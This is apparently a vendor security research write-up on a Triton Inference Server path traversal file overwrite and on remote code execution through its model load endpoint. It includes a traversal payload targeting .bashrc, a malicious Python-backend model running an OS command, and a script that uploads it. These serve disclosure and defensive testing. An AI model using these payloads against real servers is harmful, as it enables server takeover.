Inference servers are essential tools for making trained machine learning models accessible for practical use. They act as a bridge between machine learning models and their end users: once a model is trained, an inference server loads it and exposes it over network APIs so applications can send inputs and receive predictions.
From a security perspective, inference servers are often the most exposed elements in a machine learning pipeline. Because of this exposure and their direct access to the models they serve, they are valuable targets for attackers.
One of the most popular inference servers in the world is the open source Triton Inference Server. It is optimized for cloud and edge deployments, and is offered by all major cloud providers as a standard way of deploying machine learning models to end-users.
On September 20th, 2023, a member of the huntr community, l1k3beef, reported an issue in Triton where a file traversal vulnerability led to the ability to overwrite any file on the server when Triton is run using a non-default configuration option.
While the initial proof of concept in the report did not work, it fit the pattern of vulnerabilities we have found and seen in the past. After some further experimentation, we at Protect AI were able to trigger the reported vulnerability with minor changes to l1k3beef's original proof of concept.
Arbitrary file overwrites can often lead to remote code execution, allowing attackers to take complete control of the server. Code execution can be achieved through paths such as overwriting SSH keys with the attacker's keys, or overwriting the .bashrc file with malicious code that will execute the next time a user logs into the system. These exploitation paths require an extra step, however, such as an SSH server running on the host.
The Triton Inference Server exposes both HTTP/REST and GRPC API endpoints based on the standard inference protocols proposed by the KFServing project. Triton also implements a number of HTTP/REST and GRPC extensions to the KFServing inference protocol. The HTTP/REST and GRPC protocols provide endpoints to check server and model health, metadata, and statistics; additional endpoints allow model loading/unloading and inference.
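As a concrete illustration, a few of these standard endpoints can be exercised with simple GET requests. The sketch below assumes a Triton instance reachable at localhost on the default HTTP port 8000; the model name is a placeholder.

import requests

TRITON = "http://localhost:8000"  # placeholder host and default HTTP port

# Liveness and readiness checks defined by the KFServing/KServe v2 protocol
print(requests.get(f"{TRITON}/v2/health/live").status_code)
print(requests.get(f"{TRITON}/v2/health/ready").status_code)

# Server metadata, plus metadata for a single (placeholder) model
print(requests.get(f"{TRITON}/v2").json())
print(requests.get(f"{TRITON}/v2/models/mymodel").json())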
The discovered vulnerability lies in the API of one of these extensions, specifically the Model Repository Extension. When Triton is started with Dynamic Model Loading enabled via the non-default --model-control-mode explicit CLI argument, Triton becomes vulnerable to an arbitrary file overwrite attack. Prior to version 2.40 (NGC container 23.11), an attacker could craft an HTTP POST request to /v2/repository/models/<model_name>/load and supply a file:<path> JSON key whose path contains a traversal, such as the one seen below.
{
  "parameters": {
    "config": "{}",
    "file:../../root/.bashrc": "BASE64_ENCODED_FILE_CONTENTS"
  }
}
File overwrite primitives are powerful vulnerabilities. In the context of Triton, one can silently replace running models with slightly different ones, or simply bring down the entire service by overwriting system files. Remote code execution is also possible by overwriting a user's .profile or .bashrc file with, for example, a Python reverse shell which would execute the next time the user logs into the system.
Protect AI’s Threat Research team wanted to see if it was possible to turn this file write primitive into a direct remote code execution vulnerability, without requiring a user to log into the system to trigger the malicious code. Initially, the plan was to use this vulnerability to write a pickle model with malicious code injected into it to the server, then load the model to trigger the code execution. However, after some research we found that Triton has the concept of backends:
“A Triton backend is the implementation that executes a model. A backend can be a wrapper around a deep-learning framework, like PyTorch, TensorFlow, TensorRT or ONNX Runtime. Or a backend can be custom C/C++ logic performing any operation (for example, image pre-processing)... ” (https://github.com/triton-inference-server/backend)
The Python backend caught our attention:
“The Python backend allows you to write your model logic in Python. For example, you can use this backend to execute pre/post processing code written in Python …”
It dawned on us that we could potentially use this feature to get RCE by using the arbitrary file write vulnerability:
To tell Triton what backend to use for a specific model, all you have to do is specify it in the model’s config file (config.pbtxt). Below is an example model config file using the Python backend:
name: "mymodel"
backend: "python"
input [
  {
    name: "input__0"
    data_type: TYPE_FP32
    dims: [ -1, 3 ]
  }
]
...SNIP...
With the Python backend, your “model” is simply a Python file which has to contain a class named TritonPythonModel, with three specific methods:
class TritonPythonModel:
    def initialize(self, args):
        # Your code here
        return

    def execute(self, requests):
        # Your code here
        return

    def finalize(self):
        # Your code here
        return
By putting code that executes an operating system command under the initialize method and instructing Triton to load the model, we can achieve remote code execution.
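As a rough sketch, a malicious model.py of this kind might look like the following; the command and output path are placeholders, and a real model would build proper output tensors in execute rather than returning empty responses.

import os

# Only available inside Triton's Python backend runtime
import triton_python_backend_utils as pb_utils

class TritonPythonModel:
    def initialize(self, args):
        # Runs once when Triton loads the model, so any OS command placed here
        # executes in the context of the Triton server process.
        os.system("id > /tmp/pwned")  # placeholder command

    def execute(self, requests):
        # Return one empty response per request so the model stays loadable;
        # a real model would populate output tensors here.
        return [pb_utils.InferenceResponse(output_tensors=[]) for _ in requests]

    def finalize(self):
        return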
While we searched for the easiest way to turn the file overwrite into direct remote code execution without user interaction, we realized that creating a model.py file with malicious code didn’t require the file overwrite vulnerability at all. When --model-control-mode explicit is used, Triton’s load endpoint is itself capable of remotely uploading a malicious model by design. With that in mind, Protect AI’s threat research team created a Metasploit module to help security professionals test their Triton deployments. It gives the user two options to acquire a remote shell.
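In rough terms, such an in-band model upload might look like the sketch below. The host, model name, configuration, and model.py contents are placeholders, and it assumes the load endpoint's file: parameters accept version-relative paths such as 1/model.py.

import base64
import json
import requests

TRITON = "http://localhost:8000"   # placeholder host/port
model_name = "payload_model"       # placeholder model name

# Minimal JSON model configuration selecting the Python backend
config = json.dumps({
    "name": model_name,
    "backend": "python",
    "input": [{"name": "INPUT0", "data_type": "TYPE_FP32", "dims": [1]}],
    "output": [{"name": "OUTPUT0", "data_type": "TYPE_FP32", "dims": [1]}],
})

with open("model.py", "rb") as f:  # e.g. the malicious model.py sketched above
    model_py = f.read()

body = {
    "parameters": {
        "config": config,
        "file:1/model.py": base64.b64encode(model_py).decode(),
    }
}

r = requests.post(f"{TRITON}/v2/repository/models/{model_name}/load", json=body)
print(r.status_code, r.text)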
First, a fileless in-memory remote shell is available with the module’s default options via the built-in functionality of the load endpoint that is exposed when Triton is started with the --model-control-mode explicit argument. This method of acquiring a shell works with the latest version of Triton as of the time of writing, because it abuses a feature of Triton rather than a vulnerability.
Second, the module contains an option for the user to store their payload to disk by utilizing the file overwrite vulnerability. This method of acquiring a shell was patched in the latest version of Triton: 23.12.
Proof-of-concept code to test your own Triton deployments for the vulnerability is available in a GitHub repository managed by Protect AI.
The Triton Inference Server maintainers were quick to respond and fix the file overwrite vulnerability. A Secure Deployment Guide was written to inform users of the inherent risks in using the --model-control-mode explicit argument. Additionally, a Security Bulletin was posted informing users of the issues outlined above.